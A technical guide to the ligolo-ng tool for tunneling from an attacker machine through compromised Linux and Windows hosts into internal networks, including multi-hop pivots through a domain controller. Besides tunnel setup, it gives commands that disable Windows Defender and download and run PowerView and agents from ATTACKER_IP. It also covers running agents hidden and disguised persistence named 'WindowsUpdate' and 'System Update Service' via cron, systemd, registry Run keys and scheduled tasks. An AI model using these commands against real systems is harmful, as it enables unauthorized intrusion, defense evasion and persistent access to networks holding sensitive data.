ligolo-ng-guide
Ligolo-ng Tunneling Guide - macOS & Linux
Complete guide for setting up ligolo-ng tunnels to access internal networks through compromised hosts.
Architecture Overview
Attacker Machine Compromised Host (Pivot) Internal Network
(Proxy Server) <--> (Agent Client) <--> (Target Hosts)
Your Laptop/VM EC2/DMZ Server 10.0.0.0/24
Prerequisites
- Root/sudo access on attacker machine (for tunnel interface creation)
- Ability to upload files to compromised host
- Network connectivity between attacker and compromised host
- Compromised host can reach internal network
Part 1: Installation
On Attacker Machine (macOS)
# Download proxy for macOS ARM64 (M1/M2/M3)
cd /tmp
curl -L https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_$(curl -s https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep tag_name | cut -d'"' -f4 | tr -d 'v')_darwin_arm64.tar.gz -o ligolo-proxy.tar.gz
# OR for Intel Macs (x86_64)
curl -L https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_$(curl -s https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep tag_name | cut -d'"' -f4 | tr -d 'v')_darwin_amd64.tar.gz -o ligolo-proxy.tar.gz
# Extract
tar -xzf ligolo-proxy.tar.gz
chmod +x proxy
# Move to permanent location (optional)
sudo mv proxy /usr/local/bin/ligolo-proxy
On Attacker Machine (Linux)
# Download proxy for Linux AMD64
cd /tmp
curl -L https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_$(curl -s https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep tag_name | cut -d'"' -f4 | tr -d 'v')_linux_amd64.tar.gz -o ligolo-proxy.tar.gz
# OR for ARM64 (Raspberry Pi, AWS Graviton)
curl -L https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_$(curl -s https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep tag_name | cut -d'"' -f4 | tr -d 'v')_linux_arm64.tar.gz -o ligolo-proxy.tar.gz
# Extract
tar -xzf ligolo-proxy.tar.gz
chmod +x proxy
# Move to permanent location (optional)
sudo mv proxy /usr/local/bin/ligolo-proxy
Download Agent for Compromised Host
# Get agent for target system (usually Linux)
curl -L https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_agent_$(curl -s https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep tag_name | cut -d'"' -f4 | tr -d 'v')_linux_amd64.tar.gz -o ligolo-agent.tar.gz
tar -xzf ligolo-agent.tar.gz
chmod +x agent
# Keep this file - you'll upload it to the compromised host
Part 2: Network Interface Setup
On macOS (Attacker Machine)
# Create TUN interface (utun device)
# macOS uses utun interfaces instead of tun/tap
sudo ifconfig utun3 10.255.255.1/24 up
# Verify interface
ifconfig utun3
Alternative - let ligolo create interface automatically:
# macOS will auto-create utun interface when proxy starts
# Just note which interface number it creates (shown in proxy output)
On Linux (Attacker Machine)
# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip addr add 240.0.0.1/24 dev ligolo
# Verify interface
ip addr show ligolo
Troubleshooting:
# If interface already exists, delete and recreate
sudo ip link delete ligolo
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
Part 3: Upload Agent to Compromised Host
Via SCP
scp -i ~/.ssh/id_rsa agent user@compromised_host:/tmp/agent
Via HTTP (if you have web upload)
# On attacker
python3 -m http.server 8000
# On compromised host
wget http://attacker_ip:8000/agent -O /tmp/agent
chmod +x /tmp/agent
Via Base64 (when other methods fail)
# On attacker - encode agent
base64 agent > agent.b64
# Copy the base64 text to clipboard, then on compromised host:
cat > /tmp/agent.b64 << 'EOF'
<paste base64 content>
EOF
base64 -d /tmp/agent.b64 > /tmp/agent
chmod +x /tmp/agent
Part 4: Start Ligolo Tunnel
Step 1: Start Proxy (Attacker Machine)
# Using self-signed certificate (easiest, default port 11601)
sudo ligolo-proxy -selfcert
# OR with custom interface name on Linux
sudo ligolo-proxy -selfcert -tun ligolo
# OR on port 443 (RECOMMENDED - better firewall evasion)
# Port 443 is commonly allowed through firewalls as it's standard HTTPS
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:443
# OR with autocert (requires domain and port 80)
sudo ligolo-proxy -autocert -allow-domains yourdomain.com
# Output will show:
# WARN[0000] Using automatically generated self-signed certificates (Not recommended)
# INFO[0000] Listening on 0.0.0.0:11601... (or your specified port)
Why use port 443?
- Port 443 (HTTPS) is allowed by most firewalls
- Less likely to be flagged as suspicious traffic
- Blends in with normal encrypted web traffic
Leave this terminal open - this is your control interface
Step 2: Start Agent (Compromised Host)
Get your attacker's IP address first:
# On attacker (find your IP that compromised host can reach)
ip addr show | grep inet
# OR on macOS
ifconfig | grep inet
Then on compromised host:
# Connect to proxy (default port 11601)
/tmp/agent -connect ATTACKER_IP:11601 -ignore-cert
# OR connect to port 443 (if you started proxy with -laddr 0.0.0.0:443)
/tmp/agent -connect ATTACKER_IP:443 -ignore-cert
# If using custom proxy port
/tmp/agent -connect ATTACKER_IP:12345 -ignore-cert
# Run in background
nohup /tmp/agent -connect ATTACKER_IP:11601 -ignore-cert > /dev/null 2>&1 &
# Run in background on port 443
nohup /tmp/agent -connect ATTACKER_IP:443 -ignore-cert > /dev/null 2>&1 &
Step 3: Configure Tunnel (Attacker Proxy Terminal)
When agent connects, you'll see a new session in the proxy. Use these commands:
# List available sessions
ligolo-ng » session
# Select session (usually 1)
ligolo-ng » session 1
# Show information about the connected agent
[Agent : user@compromised_host] » ifconfig
# Start the tunnel
[Agent : user@compromised_host] » start
# Tunnel started! You should see:
# INFO[0000] Starting tunnel to user@compromised_host
Part 5: Add Routes
On macOS (Attacker Machine)
Open a new terminal (keep proxy running):
# Add route for internal network through utun interface
# Find your utun interface number from proxy output
sudo route add -net 10.0.0.0/24 -interface utun3
# Verify route
netstat -rn | grep utun3
# For multiple internal networks
sudo route add -net 10.0.0.0/24 -interface utun3
sudo route add -net 172.16.0.0/16 -interface utun3
sudo route add -net 192.168.1.0/24 -interface utun3
On Linux (Attacker Machine)
Open a new terminal (keep proxy running):
# Add route for internal network
sudo ip route add 10.0.0.0/24 dev ligolo
# Verify route
ip route | grep ligolo
# For multiple internal networks
sudo ip route add 10.0.0.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
sudo ip route add 192.168.1.0/24 dev ligolo
Part 6: Test & Use Tunnel
Test Connectivity
# Ping internal host
ping 10.0.0.11
# Port scan
nmap -sT 10.0.0.0/24
# SSH directly to internal host
ssh sara@10.0.0.11
# HTTP request
curl http://10.0.0.100:8080
Common Use Cases
# SSH to internal server
ssh user@10.0.0.50
# RDP to Windows machine
rdesktop 10.0.0.100
# Web application testing
burpsuite # Configure to use direct connection, not proxy
# Database connection
psql -h 10.0.0.200 -U admin -d production
# Port forwarding through tunnel
ssh -L 8080:10.0.0.50:80 user@localhost
# Now access localhost:8080 to reach 10.0.0.50:80
Part 7: Discovering Pivot Opportunities
Linux Target - Network Discovery
Once connected to a compromised host, enumerate network interfaces and connections to discover pivot opportunities:
# View all network interfaces and their IPs
ifconfig
# OR
ip addr show
# Show routing table (reveals other networks)
ip route
route -n
# Display all network connections
netstat -an
# OR
ss -tuln
# Find internal network ranges
netstat -an | grep ESTABLISHED
# Check for Docker/container networks
ip addr | grep docker
ip addr | grep br-
Windows Target - Network Discovery
# View network interfaces
ipconfig /all
# Show routing table
route print
# Display all network connections
netstat -an
# Find connections to internal networks
netstat -an | findstr "192.168."
netstat -an | findstr "10."
netstat -an | findstr "172."
# View ARP cache (shows recently contacted hosts)
arp -a
# Domain enumeration (if domain-joined)
nltest /domain_trusts
nltest /dclist:DOMAIN_NAME
Windows Domain Enumeration
For Active Directory environments, use PowerView or built-in commands:
# Disable Windows Defender (if needed for tool execution)
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true
# Download and execute PowerView
IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1')
# Find domain controllers
Get-NetDomainController
# Enumerate domain trusts
Get-NetDomainTrust
Get-NetForestTrust
# Find computers in domain
Get-NetComputer
# Map network subnets
Get-NetSubnet
Example discovery output:
# On Linux compromised host
$ ip route
default via 192.168.1.1 dev eth0
10.0.0.0/24 dev eth1 proto kernel scope link
192.168.1.0/24 dev eth0 proto kernel scope link
# This reveals: host can reach 10.0.0.0/24 - perfect pivot target!
Part 8: Multi-Pivot Scenarios
Scenario 1: Linux → Internal Network → Windows DC → Another Subnet
This example shows pivoting through multiple networks using multiple agents.
Step 1: First Pivot (Linux Host)
# On attacker - start proxy
sudo ligolo-proxy -selfcert
# Upload and run agent on first Linux host
/tmp/agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo console
ligolo-ng » session 1
[Agent : user@linux-host] » ifconfig
# Shows: 10.0.0.0/24 network available
[Agent : user@linux-host] » start
# On attacker - add route
sudo ip route add 10.0.0.0/24 dev ligolo # Linux
sudo route add -net 10.0.0.0/24 -interface utun3 # macOS
# Now you can reach 10.0.0.0/24 network
Step 2: Compromise Windows DC in 10.0.0.0/24
# From attacker, attack hosts in 10.0.0.0/24
nmap -sT 10.0.0.0/24
ssh user@10.0.0.50
# After compromising Windows DC at 10.0.0.50, discover it can reach 192.168.110.0/24
Step 3: Second Pivot (Windows DC)
# On Windows DC - download Windows agent
certutil.exe -urlcache -split -f "http://ATTACKER_IP:80/agent.exe" C:\Windows\Temp\agent.exe
# Run agent
C:\Windows\Temp\agent.exe -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo console - you now have 2 sessions
ligolo-ng » session
? Specify a session : 1: user@linux-host - 10.0.0.5:54389
2: DC01\Administrator - 10.0.0.50:54390
# Select the Windows DC session
ligolo-ng » session 2
[Agent : DC01\Administrator] » ifconfig
# Shows: 192.168.110.0/24 network available
[Agent : DC01\Administrator] » start
# On attacker - add second route
sudo ip route add 192.168.110.0/24 dev ligolo # Linux
sudo route add -net 192.168.110.0/24 -interface utun3 # macOS
# Now you can reach both 10.0.0.0/24 AND 192.168.110.0/24!
Step 4: Managing Multiple Tunnels
# View all active sessions
ligolo-ng » session
# Switch between networks by selecting sessions
ligolo-ng » session 1 # Routes through Linux host to 10.0.0.0/24
ligolo-ng » session 2 # Routes through Windows DC to 192.168.110.0/24
# Both routes are active simultaneously!
ping 10.0.0.11 # Goes through session 1
ping 192.168.110.25 # Goes through session 2
Scenario 2: Triple Pivot Example
# Attacker → Compromised Linux (10.0.0.0/24) → Windows DC (192.168.110.0/24) → DMZ Server (172.16.0.0/16)
# Session 1: Linux host
sudo ip route add 10.0.0.0/24 dev ligolo
# Session 2: Windows DC
sudo ip route add 192.168.110.0/24 dev ligolo
# Session 3: DMZ Server
sudo ip route add 172.16.0.0/16 dev ligolo
# All three networks are now accessible simultaneously!
Part 9: Windows-Specific Operations
File Transfer to Windows Targets
Method 1: Certutil (Built-in)
# Download file
certutil.exe -urlcache -split -f "http://ATTACKER_IP:80/agent.exe" C:\Temp\agent.exe
# Verify download
dir C:\Temp\agent.exe
# Run agent
C:\Temp\agent.exe -connect ATTACKER_IP:11601 -ignore-cert
Method 2: PowerShell
# Download file
(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER_IP:80/agent.exe', 'C:\Temp\agent.exe')
# OR one-liner
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER_IP:80/agent.exe', 'C:\Temp\agent.exe')"
# Run agent
C:\Temp\agent.exe -connect ATTACKER_IP:11601 -ignore-cert
Method 3: SMB Transfer
# On attacker - start SMB server
sudo impacket-smbserver share $(pwd) -smb2support
# On Windows target
copy \\ATTACKER_IP\share\agent.exe C:\Temp\agent.exe
Running Agent Stealthily on Windows
# Run in background (hidden window)
Start-Process -WindowStyle Hidden -FilePath "C:\Temp\agent.exe" -ArgumentList "-connect ATTACKER_IP:11601 -ignore-cert"
# OR as scheduled task
schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\agent.exe -connect ATTACKER_IP:11601 -ignore-cert" /sc onlogon /ru System
# OR as service (requires admin)
sc create "WindowsUpdate" binPath= "C:\Temp\agent.exe -connect ATTACKER_IP:11601 -ignore-cert"
sc start "WindowsUpdate"
Part 10: Advanced Features
Listener (Reverse Connections)
# In ligolo proxy session
[Agent : user@host] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
# Now connections to compromised_host:1234 forward to your_attacker:4444
# Useful for reverse shells
Multiple Agents
# List all connected agents
ligolo-ng » session
# Switch between agents
ligolo-ng » session 1
ligolo-ng » session 2
# Each agent can tunnel different networks
Traffic Inspection
# Start with verbose mode
sudo ligolo-proxy -selfcert -v
# See all traffic flowing through tunnel
Part 11: Practical Tips & Best Practices
Port Selection Strategy
# Port 443 - Best for stealth (HTTPS traffic)
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:443
# Port 11601 - Default, may be blocked by strict firewalls
sudo ligolo-proxy -selfcert
# Port 80 - Alternative (HTTP traffic)
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:80
# Custom high port - If target allows outbound to any port
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:8443
Organizing Multiple Agents
# Name your agents descriptively when uploading
mv agent linux-web-server-agent
mv agent.exe dc01-agent.exe
mv agent db-server-agent
# Keep notes of which session is which network
# Session 1: Web server (10.0.0.0/24)
# Session 2: DC01 (192.168.110.0/24)
# Session 3: Database (172.16.0.0/16)
Persistence Techniques
Linux:
# Add to crontab (runs on reboot)
(crontab -l 2>/dev/null; echo "@reboot /tmp/agent -connect ATTACKER_IP:443 -ignore-cert") | crontab -
# Systemd service
cat > /etc/systemd/system/update-service.service << EOF
[Unit]
Description=System Update Service
After=network.target
[Service]
ExecStart=/usr/local/bin/agent -connect ATTACKER_IP:443 -ignore-cert
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable update-service
systemctl start update-service
Windows:
# Registry Run key (runs on user login)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Windows\Temp\agent.exe -connect ATTACKER_IP:443 -ignore-cert"
# Scheduled task (runs on boot as SYSTEM)
schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\Windows\Temp\agent.exe -connect ATTACKER_IP:443 -ignore-cert" /sc onstart /ru System /rl highest
Troubleshooting Multi-Pivot Issues
# If routes conflict between sessions
# Make sure you're starting the correct session for each network
# View current routes
ip route | grep ligolo # Linux
netstat -rn | grep utun # macOS
# If ping works but tools don't, check tool's binding
# Some tools bind to wrong interface - specify interface:
curl --interface ligolo http://10.0.0.50 # Linux
Performance Optimization
# For faster performance, increase buffer sizes
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:443 -v
# Monitor bandwidth usage
# In agent terminal, check connection stats
[Agent : user@host] » info
Part 12: Cleanup
Stop Tunnel
# In ligolo proxy terminal
[Agent : user@host] » stop
# Exit session
[Agent : user@host] » quit
# Stop proxy
Ctrl+C
Remove Routes (macOS)
sudo route delete -net 10.0.0.0/24 -interface utun3
Remove Routes (Linux)
sudo ip route del 10.0.0.0/24 dev ligolo
sudo ip link delete ligolo
Kill Agent (Compromised Host)
pkill agent
# OR
ps aux | grep agent
kill -9 <PID>
Part 13: Troubleshooting
Issue: "bind: permission denied"
Solution: Proxy must run as root/sudo
sudo ligolo-proxy -selfcert
Issue: "no route to host" when accessing internal IPs
Solution: Check routes are added correctly
# macOS
netstat -rn | grep utun
sudo route add -net 10.0.0.0/24 -interface utun3
# Linux
ip route | grep ligolo
sudo ip route add 10.0.0.0/24 dev ligolo
Issue: Agent won't connect
Solution: Check firewall and network connectivity
# On attacker - ensure port 11601 is accessible
sudo ufw allow 11601/tcp # Linux
# OR
# macOS System Preferences > Security & Privacy > Firewall > Options
# Test from compromised host
telnet ATTACKER_IP 11601
nc -zv ATTACKER_IP 11601
Issue: "certificate verify failed"
Solution: Use -ignore-cert flag on agent
/tmp/agent -connect ATTACKER_IP:11601 -ignore-cert
Issue: Interface already exists
# Linux - delete and recreate
sudo ip link delete ligolo
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# macOS - use different utun number
sudo ifconfig utun4 10.255.255.1/24 up
Quick Reference Commands
macOS Complete Setup (Recommended - Port 443)
# Terminal 1 - Start Proxy on port 443 for better firewall evasion
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:443
# Terminal 2 - Add Route (after agent connects and tunnel starts)
sudo route add -net 10.0.0.0/24 -interface utun3
# Test
ping 10.0.0.11
Linux Complete Setup (Recommended - Port 443)
# Terminal 1 - Create Interface & Start Proxy on port 443
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ligolo-proxy -selfcert -tun ligolo -laddr 0.0.0.0:443
# Terminal 2 - Add Route (after agent connects and tunnel starts)
sudo ip route add 10.0.0.0/24 dev ligolo
# Test
ping 10.0.0.11
Compromised Linux Host
# Upload agent
scp -i key.pem agent user@host:/tmp/
# Start agent (port 443 for stealth)
chmod +x /tmp/agent
/tmp/agent -connect ATTACKER_IP:443 -ignore-cert
# OR run in background
nohup /tmp/agent -connect ATTACKER_IP:443 -ignore-cert > /dev/null 2>&1 &
Compromised Windows Host
# Download agent using certutil
certutil.exe -urlcache -split -f "http://ATTACKER_IP:80/agent.exe" C:\Temp\agent.exe
# Start agent
C:\Temp\agent.exe -connect ATTACKER_IP:443 -ignore-cert
# OR run hidden in background
Start-Process -WindowStyle Hidden -FilePath "C:\Temp\agent.exe" -ArgumentList "-connect ATTACKER_IP:443 -ignore-cert"
Security Notes
- Use
-ignore-certonly for testing - production should use proper certificates - Agent has full network access - compromise of agent = compromise of networks it can reach
- Encrypt traffic - ligolo uses TLS, but consider additional encryption for sensitive data
- Clean up agents - remove agent binaries and kill processes after engagement
- Firewall rules - restrict proxy port (11601) to known IPs if possible
Alternative: SSH SOCKS Proxy (Quick & Dirty)
If ligolo-ng setup fails, use SSH dynamic forwarding:
# Create SOCKS proxy through compromised host
ssh -D 1080 -f -N user@compromised_host
# Configure tools to use SOCKS proxy
# ProxyChains config: /etc/proxychains.conf
socks5 127.0.0.1 1080
# Use with tools
proxychains ssh user@10.0.0.11
proxychains nmap 10.0.0.0/24
Common Pitfalls & Solutions
Pitfall 1: Forgetting to Start the Tunnel
# After connecting agent, you MUST start the tunnel:
[Agent : user@host] » start
# Without this, routes won't work even if added correctly
Pitfall 2: Wrong Interface Number on macOS
# Check proxy output for the actual utun interface created
# Proxy output: "INFO using interface utun3"
# Then use that exact number:
sudo route add -net 10.0.0.0/24 -interface utun3
Pitfall 3: Routes Added Before Tunnel Started
# Correct order:
# 1. Start proxy
# 2. Connect agent
# 3. Select session and START tunnel
# 4. Add routes
Pitfall 4: Firewall Blocking Agent Connection
# On attacker machine, ensure firewall allows the port:
sudo ufw allow 443/tcp # Linux
# OR for macOS: System Preferences > Firewall > Options
# Test connectivity from compromised host:
nc -zv ATTACKER_IP 443
telnet ATTACKER_IP 443
Pitfall 5: Conflicting Routes Between Sessions
# Don't add overlapping routes for different sessions
# Each session should route different networks
# WRONG - both sessions trying to route same network:
# Session 1: 10.0.0.0/24
# Session 2: 10.0.0.0/24
# CORRECT - each session routes different network:
# Session 1: 10.0.0.0/24
# Session 2: 192.168.110.0/24
Network Pivot Visualization
┌─────────────────────────────────────────────────────────────────┐
│ Attacker Machine │
│ (Your Laptop/Kali VM) │
│ │
│ • Ligolo Proxy running on port 443 │
│ • Routes configured for all internal networks │
│ • Can access all pivoted networks directly │
└────────────┬────────────────────────────────────────────────────┘
│
│ Agent Connection (TLS over 443)
│
┌────────────▼────────────────────────────────────────────────────┐
│ Compromised Linux Server │
│ (Web Server) │
│ │
│ External IP: 203.0.113.50 │
│ Internal IP: 10.0.0.5 │
│ • Ligolo Agent running │
│ • Has access to DMZ network │
└────────────┬────────────────────────────────────────────────────┘
│
│ Network: 10.0.0.0/24 (DMZ)
│
┌────────────▼────────────────────────────────────────────────────┐
│ Windows Domain Controller │
│ (DC01) │
│ │
│ DMZ IP: 10.0.0.50 │
│ Internal IP: 192.168.110.10 │
│ • Second Ligolo Agent running │
│ • Has access to internal corporate network │
└────────────┬────────────────────────────────────────────────────┘
│
│ Network: 192.168.110.0/24 (Internal)
│
┌────────────▼────────────────────────────────────────────────────┐
│ Internal Database Server │
│ │
│ IP: 192.168.110.100 │
│ • PostgreSQL database │
│ • File shares │
│ • Sensitive data │
└─────────────────────────────────────────────────────────────────┘
From your attacker machine, you can now directly access:
• 10.0.0.0/24 (via Session 1)
• 192.168.110.0/24 (via Session 2)
Commands work directly:
$ ssh admin@192.168.110.100
$ nmap 192.168.110.0/24
$ psql -h 192.168.110.100 -U admin
References:
- Official GitHub: https://github.com/nicocha30/ligolo-ng
- Additional guidance from: https://medium.com/@sofwaresinner/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740